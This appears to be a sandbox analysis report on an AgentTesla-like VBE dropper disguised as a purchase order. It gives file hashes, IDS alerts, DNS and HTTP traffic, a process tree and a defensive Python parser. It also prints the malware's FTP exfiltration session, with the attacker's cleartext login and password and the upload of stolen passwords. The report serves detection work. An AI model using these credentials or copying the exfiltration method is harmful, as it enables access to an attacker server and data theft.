Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...3.u.n.e.e.q.s.g...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...3.u.n.e.e.q.s.g...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
File Type: Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Mon Nov 28 18:13:31 2022, 1st section name ".debug$S"
Category: dropped
Size (bytes): 1328
Entropy (8bit): 3.9874853720027996
Encrypted: false
SSDEEP: 24:HMe9E2vpIlKcq9dHvAFwKPfwI+ycuZhN/nakSGwPNnqSqd:HO1q3xKPo1ul/na3GoqSK
MD5: 3C6943A93469F3893ADFC0D016FE02A8
SHA1: 74F78D59A92AE02CDED002086A1C361761C99C92
SHA-256: 1823732D123E9C67B5733D7BB0FB0A20BF8636ED9F70A89D2DEEEBEABF468A38
SHA-512: 6E614BB0D63C0FDBF8B837DCE5807FD1263753912535A4090A39AA427ACACA4FC180682DC572060A2B21ECC28B5250B6D81F3897C376816F98F118A938D06B06
Malicious: false
Preview: L...K..c.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\3uneeqsg\CSC7012D3CA523F4D77AF1E1BF90852658.TMP...............4.Te....S..&.............5.......C:\Users\user\AppData\Local\Temp\RES6FA6.tmp.-.<....................a..Microsoft (R) CVTRES.Y.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...3.u.n.e.e.q.s.g...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                              File Type:ASCII text, with no line terminators
                              Category:dropped
                              Size (bytes):60
                              Entropy (8bit):4.038920595031593
                              Encrypted:false
                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                              Malicious:false
                              Preview:# PowerShell test file to determine AppLocker lockdown mode
                              Process:C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
                              File Type:ASCII text, with CRLF line terminators
                              Category:dropped
                              Size (bytes):30
                              Entropy (8bit):3.964735178725505
                              Encrypted:false
                              SSDEEP:3:IBVFBWAGRHneyy:ITqAGRHner
                              MD5:9F754B47B351EF0FC32527B541420595
                              SHA1:006C66220B33E98C725B73495FE97B3291CE14D9
                              SHA-256:0219D77348D2F0510025E188D4EA84A8E73F856DEB5E0878D673079D05840591
                              SHA-512:C6996379BCB774CE27EEEC0F173CBACC70CA02F3A773DD879E3A42DA554535A94A9C13308D14E873C71A338105804AFFF32302558111EE880BA0C41747A08532
                              Malicious:false
                              Preview:NordVPN directory not found!..
                              File type:ASCII text, with CRLF line terminators
                              Entropy (8bit):5.855492842209971
                              TrID:
                                File name:PO-08784 xlsx.vbe
                                File size:352659
                                MD5:266115592f966240c14dfeeec624bdf5
                                SHA1:455a06b52d8e8f46d9a80067d3d1b1ea23036d65
                                SHA256:1df8d51920f7e386c6b86379363cc42dd86fe47a933e36cecd23c7b08d3118e2
                                SHA512:951e630a3faca243913ef3955fda178356ab1fbab1dc236c9ef6db096fc1c48b517bcce5b9964f72de213787aca6f9acdeb71fe669119f435088e2c9dcb47e7e
                                SSDEEP:6144:JRYNxYchRj8pwdtWU4QfN+jWR4MvMsLYstdy2BxV72Q8qE+dRLzHb4HZIKK:jwhRjNtWU4vWRDvtEIy0xV7tNnRW6KK
                                TLSH:D874AEB1993126244D0F130BAB861AC48CE937E71513232D5DABF78D2633F4F926E6D9
                                File Content Preview:..'zephyrian stratagem Wigwamerne177 Alcoholisable53 PROMISINGLY ..'ACETAMID GRANULARITY Mandatet torteaus TANGFORLSENDES ALTOCUMULUS Jambarts ..'Gein187 garglers Goslet Afblsnings ENEHERREDMMERS UNDSEELIGHED TUSSENS Mrtelvrkets139 HOG besvrger stellularl
                                Icon Hash:e8d69ece869a9ec4
                                 Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                 11/28/22-18:14:18.239839 | TCP | 2029927 | ET TROJAN AgentTesla Exfil via FTP | 49807 | 21 | 192.168.11.20 | 185.31.121.136
                                 11/28/22-18:14:18.274476 | TCP | 2851779 | ETPRO TROJAN Agent Tesla Telegram Exfil | 49808 | 56411 | 192.168.11.20 | 185.31.121.136
                                 Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                 Nov 28, 2022 18:14:03.133449078 CET | 49803 | 80 | 192.168.11.20 | 192.185.145.188
                                 Nov 28, 2022 18:14:03.247994900 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.248229027 CET | 49803 | 80 | 192.168.11.20 | 192.185.145.188
                                 Nov 28, 2022 18:14:03.248883963 CET | 49803 | 80 | 192.168.11.20 | 192.185.145.188
                                 Nov 28, 2022 18:14:03.363363981 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.371316910 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.371407032 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.371470928 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.371532917 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.371570110 CET | 49803 | 80 | 192.168.11.20 | 192.185.145.188
                                 Nov 28, 2022 18:14:03.371597052 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.371643066 CET | 49803 | 80 | 192.168.11.20 | 192.185.145.188
                                 Nov 28, 2022 18:14:03.371643066 CET | 49803 | 80 | 192.168.11.20 | 192.185.145.188
                                 Nov 28, 2022 18:14:03.371663094 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.371726990 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.371767998 CET | 49803 | 80 | 192.168.11.20 | 192.185.145.188
                                 Nov 28, 2022 18:14:03.371767998 CET | 49803 | 80 | 192.168.11.20 | 192.185.145.188
                                 Nov 28, 2022 18:14:03.371789932 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.371835947 CET | 49803 | 80 | 192.168.11.20 | 192.185.145.188
                                 Nov 28, 2022 18:14:03.371854067 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.371920109 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.371956110 CET | 49803 | 80 | 192.168.11.20 | 192.185.145.188
                                 Nov 28, 2022 18:14:03.372128963 CET | 49803 | 80 | 192.168.11.20 | 192.185.145.188
                                 Nov 28, 2022 18:14:03.486287117 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.486327887 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.486346960 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.486371994 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.486390114 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.486406088 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.486506939 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.486511946 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.486512899 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.486512899 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.486515999 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.486542940 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.486560106 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.486576080 CET | 49803 | 80 | 192.168.11.20 | 192.185.145.188
                                 Nov 28, 2022 18:14:03.486587048 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.486603975 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.486684084 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.486687899 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.486689091 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.486690044 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.486706018 CET | 49803 | 80 | 192.168.11.20 | 192.185.145.188
                                 Nov 28, 2022 18:14:03.486706018 CET | 49803 | 80 | 192.168.11.20 | 192.185.145.188
                                 Nov 28, 2022 18:14:03.486733913 CET | 49803 | 80 | 192.168.11.20 | 192.185.145.188
                                 Nov 28, 2022 18:14:03.486809969 CET | 49803 | 80 | 192.168.11.20 | 192.185.145.188
                                 Nov 28, 2022 18:14:03.486810923 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.486840010 CET | 49803 | 80 | 192.168.11.20 | 192.185.145.188
                                 Nov 28, 2022 18:14:03.486840010 CET | 49803 | 80 | 192.168.11.20 | 192.185.145.188
                                 Nov 28, 2022 18:14:03.486920118 CET | 49803 | 80 | 192.168.11.20 | 192.185.145.188
                                 Nov 28, 2022 18:14:03.487032890 CET | 49803 | 80 | 192.168.11.20 | 192.185.145.188
                                 Nov 28, 2022 18:14:03.602055073 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.602243900 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.602268934 CET | 49803 | 80 | 192.168.11.20 | 192.185.145.188
                                 Nov 28, 2022 18:14:03.602340937 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.602463961 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.602469921 CET | 49803 | 80 | 192.168.11.20 | 192.185.145.188
                                 Nov 28, 2022 18:14:03.602519989 CET | 49803 | 80 | 192.168.11.20 | 192.185.145.188
                                 Nov 28, 2022 18:14:03.602653027 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.602660894 CET | 49803 | 80 | 192.168.11.20 | 192.185.145.188
                                 Nov 28, 2022 18:14:03.602732897 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.602791071 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.602860928 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.602897882 CET | 49803 | 80 | 192.168.11.20 | 192.185.145.188
                                 Nov 28, 2022 18:14:03.602899075 CET | 49803 | 80 | 192.168.11.20 | 192.185.145.188
                                 Nov 28, 2022 18:14:03.602914095 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.602957964 CET | 49803 | 80 | 192.168.11.20 | 192.185.145.188
                                 Nov 28, 2022 18:14:03.602967978 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.603020906 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.603055954 CET | 49803 | 80 | 192.168.11.20 | 192.185.145.188
                                 Nov 28, 2022 18:14:03.603055954 CET | 49803 | 80 | 192.168.11.20 | 192.185.145.188
                                 Nov 28, 2022 18:14:03.603074074 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.603115082 CET | 49803 | 80 | 192.168.11.20 | 192.185.145.188
                                 Nov 28, 2022 18:14:03.603127003 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.603180885 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.603230000 CET | 49803 | 80 | 192.168.11.20 | 192.185.145.188
                                 Nov 28, 2022 18:14:03.603234053 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.603230000 CET | 49803 | 80 | 192.168.11.20 | 192.185.145.188
                                 Nov 28, 2022 18:14:03.603287935 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.603290081 CET | 49803 | 80 | 192.168.11.20 | 192.185.145.188
                                 Nov 28, 2022 18:14:03.603341103 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.603387117 CET | 49803 | 80 | 192.168.11.20 | 192.185.145.188
                                 Nov 28, 2022 18:14:03.603387117 CET | 49803 | 80 | 192.168.11.20 | 192.185.145.188
                                 Nov 28, 2022 18:14:03.603394985 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.603445053 CET | 49803 | 80 | 192.168.11.20 | 192.185.145.188
                                 Nov 28, 2022 18:14:03.603449106 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.603502035 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.603554964 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.603554010 CET | 49803 | 80 | 192.168.11.20 | 192.185.145.188
                                 Nov 28, 2022 18:14:03.603554010 CET | 49803 | 80 | 192.168.11.20 | 192.185.145.188
                                 Nov 28, 2022 18:14:03.603606939 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.603611946 CET | 49803 | 80 | 192.168.11.20 | 192.185.145.188
                                 Nov 28, 2022 18:14:03.603660107 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.603708982 CET | 49803 | 80 | 192.168.11.20 | 192.185.145.188
                                 Nov 28, 2022 18:14:03.603714943 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.603708982 CET | 49803 | 80 | 192.168.11.20 | 192.185.145.188
                                 Nov 28, 2022 18:14:03.603770018 CET | 49803 | 80 | 192.168.11.20 | 192.185.145.188
                                 Nov 28, 2022 18:14:03.603770971 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Nov 28, 2022 18:14:03.603825092 CET | 80 | 49803 | 192.185.145.188 | 192.168.11.20
                                 Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                 Nov 28, 2022 18:14:03.095999956 CET | 52278 | 53 | 192.168.11.20 | 1.1.1.1
                                 Nov 28, 2022 18:14:03.119677067 CET | 53 | 52278 | 1.1.1.1 | 192.168.11.20
                                 Nov 28, 2022 18:14:08.765639067 CET | 59594 | 53 | 192.168.11.20 | 1.1.1.1
                                 Nov 28, 2022 18:14:08.787539005 CET | 53 | 59594 | 1.1.1.1 | 192.168.11.20
                                 Nov 28, 2022 18:14:17.763895035 CET | 58435 | 53 | 192.168.11.20 | 1.1.1.1
                                 Nov 28, 2022 18:14:17.891381979 CET | 53 | 58435 | 1.1.1.1 | 192.168.11.20
                                 Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                 Nov 28, 2022 18:14:03.095999956 CET | 192.168.11.20 | 1.1.1.1 | 0x4412 | Standard query (0) | b3solutionscws.com | A (IP address) | IN (0x0001) | false
                                 Nov 28, 2022 18:14:08.765639067 CET | 192.168.11.20 | 1.1.1.1 | 0xf773 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
                                 Nov 28, 2022 18:14:17.763895035 CET | 192.168.11.20 | 1.1.1.1 | 0xead4 | Standard query (0) | ftp.mcmprint.net | A (IP address) | IN (0x0001) | false
                                 Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                 Nov 28, 2022 18:14:03.119677067 CET | 1.1.1.1 | 192.168.11.20 | 0x4412 | No error (0) | b3solutionscws.com | - | 192.185.145.188 | A (IP address) | IN (0x0001) | false
                                 Nov 28, 2022 18:14:08.787539005 CET | 1.1.1.1 | 192.168.11.20 | 0xf773 | No error (0) | api.ipify.org | api.ipify.org.herokudns.com | - | CNAME (Canonical name) | IN (0x0001) | false
                                 Nov 28, 2022 18:14:08.787539005 CET | 1.1.1.1 | 192.168.11.20 | 0xf773 | No error (0) | api.ipify.org.herokudns.com | - | 54.91.59.199 | A (IP address) | IN (0x0001) | false
                                 Nov 28, 2022 18:14:08.787539005 CET | 1.1.1.1 | 192.168.11.20 | 0xf773 | No error (0) | api.ipify.org.herokudns.com | - | 3.220.57.224 | A (IP address) | IN (0x0001) | false
                                 Nov 28, 2022 18:14:08.787539005 CET | 1.1.1.1 | 192.168.11.20 | 0xf773 | No error (0) | api.ipify.org.herokudns.com | - | 52.20.78.240 | A (IP address) | IN (0x0001) | false
                                 Nov 28, 2022 18:14:08.787539005 CET | 1.1.1.1 | 192.168.11.20 | 0xf773 | No error (0) | api.ipify.org.herokudns.com | - | 3.232.242.170 | A (IP address) | IN (0x0001) | false
                                 Nov 28, 2022 18:14:17.891381979 CET | 1.1.1.1 | 192.168.11.20 | 0xead4 | No error (0) | ftp.mcmprint.net | - | 185.31.121.136 | A (IP address) | IN (0x0001) | false
                                • api.ipify.org
                                • b3solutionscws.com
                                 Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                                 Nov 28, 2022 18:14:17.958723068 CET | 21 | 49807 | 185.31.121.136 | 192.168.11.20 | 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------
                                   220-You are user number 1 of 50 allowed.
                                   220-Local time is now 19:14. Server port: 21.
                                   220-This is a private system - No anonymous login
                                   220-IPv6 connections are also welcome on this server.
                                   220 You will be disconnected after 15 minutes of inactivity.
                                 Nov 28, 2022 18:14:17.959058046 CET | 49807 | 21 | 192.168.11.20 | 185.31.121.136 | USER klogz@mcmprint.net
                                 Nov 28, 2022 18:14:17.991482973 CET | 21 | 49807 | 185.31.121.136 | 192.168.11.20 | 331 User klogz@mcmprint.net OK. Password required
                                 Nov 28, 2022 18:14:17.991899967 CET | 49807 | 21 | 192.168.11.20 | 185.31.121.136 | PASS l9Hh{#_(0shZ
                                 Nov 28, 2022 18:14:18.040401936 CET | 21 | 49807 | 185.31.121.136 | 192.168.11.20 | 230 OK. Current restricted directory is /
                                 Nov 28, 2022 18:14:18.073179960 CET | 21 | 49807 | 185.31.121.136 | 192.168.11.20 | 504 Unknown command
                                 Nov 28, 2022 18:14:18.073748112 CET | 49807 | 21 | 192.168.11.20 | 185.31.121.136 | PWD
                                 Nov 28, 2022 18:14:18.106071949 CET | 21 | 49807 | 185.31.121.136 | 192.168.11.20 | 257 "/" is your current location
                                 Nov 28, 2022 18:14:18.106791973 CET | 49807 | 21 | 192.168.11.20 | 185.31.121.136 | CWD /
                                 Nov 28, 2022 18:14:18.139123917 CET | 21 | 49807 | 185.31.121.136 | 192.168.11.20 | 250 OK. Current directory is /
                                 Nov 28, 2022 18:14:18.139384031 CET | 49807 | 21 | 192.168.11.20 | 185.31.121.136 | TYPE I
                                 Nov 28, 2022 18:14:18.171904087 CET | 21 | 49807 | 185.31.121.136 | 192.168.11.20 | 200 TYPE is now 8-bit binary
                                 Nov 28, 2022 18:14:18.173265934 CET | 49807 | 21 | 192.168.11.20 | 185.31.121.136 | PASV
                                 Nov 28, 2022 18:14:18.205801964 CET | 21 | 49807 | 185.31.121.136 | 192.168.11.20 | 227 Entering Passive Mode (185,31,121,136,220,91)
                                 Nov 28, 2022 18:14:18.239839077 CET | 49807 | 21 | 192.168.11.20 | 185.31.121.136 | STOR PW_user-367706_2022_11_28_18_14_15.html
                                 Nov 28, 2022 18:14:18.274036884 CET | 21 | 49807 | 185.31.121.136 | 192.168.11.20 | 150 Accepted data connection
                                 Nov 28, 2022 18:14:18.306859016 CET | 21 | 49807 | 185.31.121.136 | 192.168.11.20 | 226-File successfully transferred
                                   226 0.033 seconds (measured here), 13.71 Kbytes per second
                                 Nov 28, 2022 18:15:57.808657885 CET | 21 | 49807 | 185.31.121.136 | 192.168.11.20 | 226 Logout.
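The FTP session above is the AgentTesla exfiltration end to end: the login goes over the control channel in clear text, the 227 reply announces the passive data port, and STOR pushes the harvested-password report. The parser below is an added example, not code from the report or from the sample. It reads control-channel lines in the timestamp / source port / dest port / source IP / dest IP / text layout the report uses (a constructed excerpt of this session is embedded, with `|` added as the column separator), recovers the credentials, the passive data port and the uploaded file name, and cross-checks the computed data port against the Snort alert's destination port 56411. The `PW_<host>_<timestamp>.html` naming rule is generalised from the single file name captured here and is an assumption, not something the report states.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Constructed excerpt of the control channel listed in the report, one line per
# command/reply: timestamp|src port|dst port|src IP|dst IP|text.
SESSION = """\
Nov 28, 2022 18:14:17.959058046 CET|49807|21|192.168.11.20|185.31.121.136|USER klogz@mcmprint.net
Nov 28, 2022 18:14:17.991482973 CET|21|49807|185.31.121.136|192.168.11.20|331 User klogz@mcmprint.net OK. Password required
Nov 28, 2022 18:14:17.991899967 CET|49807|21|192.168.11.20|185.31.121.136|PASS l9Hh{#_(0shZ
Nov 28, 2022 18:14:18.040401936 CET|21|49807|185.31.121.136|192.168.11.20|230 OK. Current restricted directory is /
Nov 28, 2022 18:14:18.139384031 CET|49807|21|192.168.11.20|185.31.121.136|TYPE I
Nov 28, 2022 18:14:18.173265934 CET|49807|21|192.168.11.20|185.31.121.136|PASV
Nov 28, 2022 18:14:18.205801964 CET|21|49807|185.31.121.136|192.168.11.20|227 Entering Passive Mode (185,31,121,136,220,91)
Nov 28, 2022 18:14:18.239839077 CET|49807|21|192.168.11.20|185.31.121.136|STOR PW_user-367706_2022_11_28_18_14_15.html
Nov 28, 2022 18:14:18.274036884 CET|21|49807|185.31.121.136|192.168.11.20|150 Accepted data connection
Nov 28, 2022 18:14:18.306859016 CET|21|49807|185.31.121.136|192.168.11.20|226 0.033 seconds (measured here), 13.71 Kbytes per second
"""

# RFC 959 passive reply: the last two numbers are the high and low byte of the data port.
PASV_RE = re.compile(r"^227 .*?\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)")

# Assumed stealer-report naming, generalised from the one upload seen in this session
# (PW_user-367706_2022_11_28_18_14_15.html): two-letter kind, host tag, Y_m_d_H_M_S stamp.
REPORT_NAME_RE = re.compile(r"^(?P<kind>[A-Z]{2})_(?P<host>.+)_(?P<stamp>\d{4}(?:_\d{2}){5})\.html$")

@dataclass
class FtpExfil:
    server: Optional[str] = None
    user: Optional[str] = None
    password: Optional[str] = None
    data_port: Optional[int] = None
    uploads: List[str] = field(default_factory=list)
    transferred: bool = False

def pasv_port(reply: str) -> Optional[int]:
    """'227 Entering Passive Mode (h1,h2,h3,h4,p1,p2)' -> p1*256 + p2, or None."""
    m = PASV_RE.match(reply)
    if not m:
        return None
    return int(m.group(5)) * 256 + int(m.group(6))

def analyse(session: str) -> FtpExfil:
    """Walk the control channel once and collect what an analyst needs from it."""
    result = FtpExfil()
    for raw in session.splitlines():
        if not raw.strip():
            continue
        _ts, _sport, dport, _sip, dip, text = raw.split("|", 5)
        if int(dport) == 21:                      # client -> server command
            result.server = dip
            verb, _, arg = text.partition(" ")
            verb = verb.upper()
            if verb == "USER":
                result.user = arg
            elif verb == "PASS":
                result.password = arg
            elif verb == "STOR":
                result.uploads.append(arg)
        else:                                     # server -> client reply
            if text.startswith("227"):
                result.data_port = pasv_port(text)
            elif text.startswith("226"):
                result.transferred = True
    return result

def looks_like_stealer_report(filename: str) -> bool:
    return REPORT_NAME_RE.match(filename) is not None

def matches_alert(result: FtpExfil, alert_dst_ip: str, alert_dst_port: int) -> bool:
    """True when an IDS alert's destination is this session's passive data channel."""
    return result.server == alert_dst_ip and result.data_port == alert_dst_port

if __name__ == "__main__":
    r = analyse(SESSION)
    print(r)
    print("data port matches Snort alert:", matches_alert(r, "185.31.121.136", 56411))
```

The arithmetic on the 227 reply (220 * 256 + 91 = 56411) is what ties the two Snort alerts together: the second alert's destination port is exactly this passive data port, so it fired on the data connection carrying the uploaded HTML report, not on a separate Telegram request. A credential pair and a STOR of a `PW_*.html` file within a second of login, to a host resolved moments earlier, is the pattern worth alerting on in your own FTP logs.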


                                Target ID:0
                                Start time:18:12:34
                                Start date:28/11/2022
                                Path:C:\Windows\System32\wscript.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\PO-08784 xlsx.vbe"
                                Imagebase:0x7ff7b4380000
                                File size:170496 bytes
                                MD5 hash:0639B0A6F69B3265C1E42227D650B7D1
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                Target ID:2
                                Start time:18:12:36
                                Start date:28/11/2022
                                Path:C:\Windows\System32\cmd.exe
                                Wow64 process (32bit):false
                                Commandline:CMD.EXE /c echo C:\Windows
                                Imagebase:0x7ff7dd5d0000
                                File size:289792 bytes
                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                Target ID:3
                                Start time:18:12:36
                                Start date:28/11/2022
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6b8be0000
                                File size:875008 bytes
                                MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Target ID:4
                                Start time:18:12:59
                                Start date:28/11/2022
                                Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):true
